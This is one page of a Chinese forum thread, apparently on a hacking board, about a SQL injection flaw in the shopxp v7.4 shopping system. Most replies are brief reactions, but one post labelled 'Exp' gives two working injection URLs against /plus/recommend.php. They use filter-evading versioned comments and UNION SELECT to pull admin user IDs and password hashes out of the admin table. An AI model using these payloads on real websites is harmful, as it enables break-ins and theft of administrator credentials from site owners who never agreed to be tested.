guhu 发表于 2014-7-26 02:37:23

亚麻跌i 发表于 2014-7-26 05:50:24

zhanxiaobo 发表于 2014-8-19 07:47:52

b952658176 发表于 2014-8-25 23:56:24

Exp:
plus/recommend.php?action=&aid=1&_FILES=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,7,8,9%23@`\'`+&_FILES=1.jpg&_FILES =application/octet-stream&_FILES=111

另外一枚/plus/recommend.php?aid=1&_FILES&_FILES&_FILES&_FILES=aa\'and+char(@`'`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,group_concat(userid,0x23,pwd),5,6,7,8,9 from `%23@__admin`%23

CH4 发表于 2014-8-26 03:03:33

看看学习一下

蜂巢 发表于 2014-8-27 20:35:45

小涛 发表于 2014-8-27 21:00:30

瞅瞅和v8.0的区别

bclm518 发表于 2014-8-28 00:34:34

{:2_27:}{:2_27:}{:2_27:}

731046538 发表于 2014-10-19 13:31:44

这个好啊 哈哈哈哈

Oshell丶Gr 发表于 2014-10-20 19:07:44

:):):):)学习xxLZ
页: 1 2 3 4 5 6 7 8 [9] 10 11 12 13
查看完整版本: shopxp网上购物系统 v7.4 SQL注入漏洞